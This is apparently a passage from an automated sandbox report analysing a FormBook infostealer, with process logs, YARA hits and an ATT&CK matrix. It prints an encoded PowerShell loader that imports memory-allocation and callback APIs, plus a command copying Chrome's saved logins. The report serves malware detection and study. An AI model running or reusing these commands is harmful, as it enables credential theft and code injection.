AHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEIAVQBUAFQARQBSAE0AQQAsAHUAaQBuAHQAIABDAG8AbgB0AHIAYQA2ACwAaQBuAHQAIAB1AG4AZAB2AHIAcABpAGUAdABpACwAaQBuAHQAIABPAGYAYQB5AHYAZQAwACwAaQBuAHQAIABGAG8AbABkAHkAcwB5ADcALABpAG4AdAAgAE8AYgBvAGUAcgA4ACwAaQBuAHQAIABCAEwAVQBGAEYAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAAUgBhAHMAawBvADgAMAAsAHUAaQBuAHQAIABSAGEAcwBrAG8AOAAxACwASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAAyACwAcgBlAGYAIABJAG4AdAAzADIAIABSAGEAcwBrAG8AOAAzACwAaQBuAHQAIABSAGEAcwBrAG8AOAA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAA1ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA2ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA3ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA4ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEgAdQB0AHUANwAgAGcAYQByAGEAbgAgAGQAeQBzAGMAaAAgAFUATgBVAE4ASQAgAFMAdABvAHIAIABPAFYARQBSAEkATgAgAGwAaQBmAHQAbQBhACAARQBsAGUAYwB0AHIAbwBkAGkAIABJAHIAcgBpAHQAZQByAGUAdAA0ACAAQgBvAG4AaQBuAGkAdABlADcAIABlAGMAZAB5AHMAbwBuAGEAbgAgAHMAaABhAHIAIABLAGEAcgBhAG4AdABuAGUAcwB0ACAAYgByAHUAdAB0AG8AIABhAG4AdAByAGEAYwBpACAARgB5AHIAbQBlACAATABhAHUAZAByAHUAcAB0AHIAaQA2ACAAZABlAHMAcABvAHQAaQB6ACAAVABlAG0AcABlAGwAawAgAFIAZQB0AHMAcwBpAGsAIABkAGUAbQBvAHUAZABnAGEAdgBlACAAVABBAEMAVABVACAATwBiAGoAdQAgAEwAVQBEAEkAQwBSAE8AVQBTAEMAIABzAHQAdQBtACAAV
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBBAEkAUgBFAEQAIABTAGUAbgBnAGUAbABlAGoAIABWAGUAbgBkAGUAdABhADgAIABUAEUASQBTAFQARQAgAEYAbwBlAGwAZQBsAHMAZQBzAG0AOQAgAGEAbgB0AGkAdAB5AHIAbwAgAFQASQBMAFMAIABCAEwARwBGAFIAVQAgAEIAeQBkAGUAZgA1ACAATQBpAGwAaQA1ACAAQQBwAHAAbwBzACAAcwBvAGYAdABmAG8AbgB0AGUAdAAgAGEAbABrAG8AIABuAG8AbgBtAGEAcgBrAGUAdAAgAE0AbwBkAGkAcwAgAE0AbwBpAHMAIABVAG4AdgBlAGkAbABlAGQAIABVAG4AZQBtAGEAYwAgAGcAYQByAGIAbABlAHMAZgAgAHQAZQBlAG4AYQAgAFMASABVAFQAVABMAEUAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAE8AZgBhAHkAdgBlADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABPAGYAYQB5AHYAZQA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAHcAYQB0ADkALABpAG4AdAAgAFIAYQBzAGsAbwA4ACwAcgBlAGYAIABJAG4AdAAzADIAIABPAGYAYQB5AHYAZQAsAGkAbgB0ACAATQBlAHQAegBlAHIAZQBzAHAAZQA5ACwAaQBuAHQAIABPAGYAYQB5AHYAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEIAVQBUAFQARQBSAE0AQQAsAHUAaQBuAHQAIABDAG8AbgB0AHIAYQA2ACwAaQBuAHQAIAB1AG4AZAB2AHIAcABpAGUAdABpACwAaQBuAHQAIABPAGYAYQB5AHYAZQAwACwAaQBuAHQAIABGAG8AbABkAHkAcwB5ADcALABpAG4AdAAgAE8AYgBvAGUAcgA4ACwAaQBuAHQAIABCAEwAVQBGAEYAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAAUgBhAHMAawBvADgAMAAsAHUAaQBuAHQAIABSAGEAcwBrAG8AOAAxACwASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAAyACwAcgBlAGYAIABJAG4AdAAzADIAIABSAGEAcwBrAG8AOAAzACwAaQBuAHQAIABSAGEAcwBrAG8AOAA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAA1ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA2ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA3ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA4ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEgAdQB0AHUANwAgAGcAYQByAGEAbgAgAGQAeQBzAGMAaAAgAFUATgBVAE4ASQAgAFMAdABvAHIAIABPAFYARQBSAEkATgAgAGwAaQBmAHQAbQBhACAARQBsAGUAYwB0AHIAbwBkAGkAIABJAHIAcgBpAHQAZQByAGUAdAA0ACAAQgBvAG4AaQBuAGkAdABlADcAIABlAGMAZAB5AHMAbwBuAGEAbgAgAHMAaABhAHIAIABLAGEAcgBhAG4AdABuAGUAcwB0ACAAYgByAHUAdAB0AG8AIABhAG4AdAByAGEAYwBpACAARgB5AHIAbQBlACAATABhAHUAZAByAHUAcAB0AHIAaQA2ACAAZABlAHMAcABvAHQAaQB6ACAAVABlAG0AcABlAGwAawAgAFIAZQB0AHMAcwBpAGsAIABkAGUAbQBvAHUAZABnAGEAdgBlACAAVABBAEMAVABVACAATwBiAGoAdQAgAEwAVQBEAEkAQwBSAE8AVQBTAEMAIABzAHQAdQBtACAAVJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBBAEkAUgBFAEQAIABTAGUAbgBnAGUAbABlAGoAIABWAGUAbgBkAGUAdABhADgAIABUAEUASQBTAFQARQAgAEYAbwBlAGwAZQBsAHMAZQBzAG0AOQAgAGEAbgB0AGkAdAB5AHIAbwAgAFQASQBMAFMAIABCAEwARwBGAFIAVQAgAEIAeQBkAGUAZgA1ACAATQBpAGwAaQA1ACAAQQBwAHAAbwBzACAAcwBvAGYAdABmAG8AbgB0AGUAdAAgAGEAbABrAG8AIABuAG8AbgBtAGEAcgBrAGUAdAAgAE0AbwBkAGkAcwAgAE0AbwBpAHMAIABVAG4AdgBlAGkAbABlAGQAIABVAG4AZQBtAGEAYwAgAGcAYQByAGIAbABlAHMAZgAgAHQAZQBlAG4AYQAgAFMASABVAFQAVABMAEUAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAE8AZgBhAHkAdgBlADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABPAGYAYQB5AHYAZQA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAHcAYQB0ADkALABpAG4AdAAgAFIAYQBzAGsAbwA4ACwAcgBlAGYAIABJAG4AdAAzADIAIABPAGYAYQB5AHYAZQAsAGkAbgB0ACAATQBlAHQAegBlAHIAZQBzAHAAZQA5ACwAaQBuAHQAIABPAGYAYQB5AHYAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEIAVQBUAFQARQBSAE0AQQAsAHUAaQBuAHQAIABDAG8AbgB0AHIAYQA2ACwAaQBuAHQAIAB1AG4AZAB2AHIAcABpAGUAdABpACwAaQBuAHQAIABPAGYAYQB5AHYAZQAwACwAaQBuAHQAIABGAG8AbABkAHkAcwB5ADcALABpAG4AdAAgAE8AYgBvAGUAcgA4ACwAaQBuAHQAIABCAEwAVQBGAEYAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAAUgBhAHMAawBvADgAMAAsAHUAaQBuAHQAIABSAGEAcwBrAG8AOAAxACwASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAAyACwAcgBlAGYAIABJAG4AdAAzADIAIABSAGEAcwBrAG8AOAAzACwAaQBuAHQAIABSAGEAcwBrAG8AOAA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAA1ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA2ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA3ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA4ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEgAdQB0AHUANwAgAGcAYQByAGEAbgAgAGQAeQBzAGMAaAAgAFUATgBVAE4ASQAgAFMAdABvAHIAIABPAFYARQBSAEkATgAgAGwAaQBmAHQAbQBhACAARQBsAGUAYwB0AHIAbwBkAGkAIABJAHIAcgBpAHQAZQByAGUAdAA0ACAAQgBvAG4AaQBuAGkAdABlADcAIABlAGMAZAB5AHMAbwBuAGEAbgAgAHMAaABhAHIAIABLAGEAcgBhAG4AdABuAGUAcwB0ACAAYgByAHUAdAB0AG8AIABhAG4AdAByAGEAYwBpACAARgB5AHIAbQBlACAATABhAHUAZAByAHUAcAB0AHIAaQA2ACAAZABlAHMAcABvAHQAaQB6ACAAVABlAG0AcABlAGwAawAgAFIAZQB0AHMAcwBpAGsAIABkAGUAbQBvAHUAZABnAGEAdgBlACAAVABBAEMAVABVACAATwBiAGoAdQAgAEwAVQBEAEkAQwBSAE8AVQBTAEMAIABzAHQAdQBtACAAVJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.cmdlineJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4377.tmp" "c:\Users\user\AppData\Local\Temp\5wwhq3bl\CSCEED551C9B69E4D3BACB27851B833AAE.TMP"Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /VJump to behavior
      Source: explorer.exe, 00000018.00000000.688218123.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.679029461.00000000083E7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000018.00000000.707977610.0000000004F80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000018.00000000.696204667.00000000083E7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000018.00000000.667253019.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.757490893.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.705115413.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.759848257.0000000004F80000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000018.00000000.688218123.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.666851055.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000000.667253019.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.757490893.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.705115413.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.756579191.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000000.687801292.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000000.704619524.00000000008B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000018.00000000.688218123.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.667253019.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.757490893.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.705115413.0000000000EE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: &Program Manager
      Source: explorer.exe, 00000018.00000000.688218123.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.667253019.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.757490893.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.705115413.0000000000EE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000002.873877212.0000000002710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000018.00000000.698865578.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000002.873684957.0000000000550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000002.729280321.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000002.729334535.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000018.00000000.716819564.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Tries to steal Mail credentials (via file / registry access)
      Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login DataJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior

      Remote Access Functionality

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000002.873877212.0000000002710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000018.00000000.698865578.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000002.873684957.0000000000550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000002.729280321.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000002.729334535.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000018.00000000.716819564.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts521
      Scripting      		1
      Registry Run Keys / Startup Folder      		612
      Process Injection      		11
      Deobfuscate/Decode Files or Information      		1
      OS Credential Dumping      		2
      File and Directory Discovery      		Remote Services1
      Archive Collected Data      		Exfiltration Over Other Network Medium1
      Ingress Tool Transfer      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default Accounts1
      Shared Modules      		Boot or Logon Initialization Scripts1
      Registry Run Keys / Startup Folder      		521
      Scripting      		1
      Credential API Hooking      		114
      System Information Discovery      		Remote Desktop Protocol1
      Data from Local System      		Exfiltration Over Bluetooth11
      Encrypted Channel      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain Accounts11
      Command and Scripting Interpreter      		Logon Script (Windows)Logon Script (Windows)3
      Obfuscated Files or Information      		Security Account Manager1
      Query Registry      		SMB/Windows Admin Shares1
      Email Collection      		Automated Exfiltration3
      Non-Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local Accounts2
      PowerShell      		Logon Script (Mac)Logon Script (Mac)1
      Rootkit      		NTDS421
      Security Software Discovery      		Distributed Component Object Model1
      Credential API Hooking      		Scheduled Transfer114
      Application Layer Protocol      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      Masquerading      		LSA Secrets2
      Process Discovery      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common231
      Virtualization/Sandbox Evasion      		Cached Domain Credentials231
      Virtualization/Sandbox Evasion      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items612
      Process Injection      		DCSync1
      Application Window Discovery      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
      Remote System Discovery      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
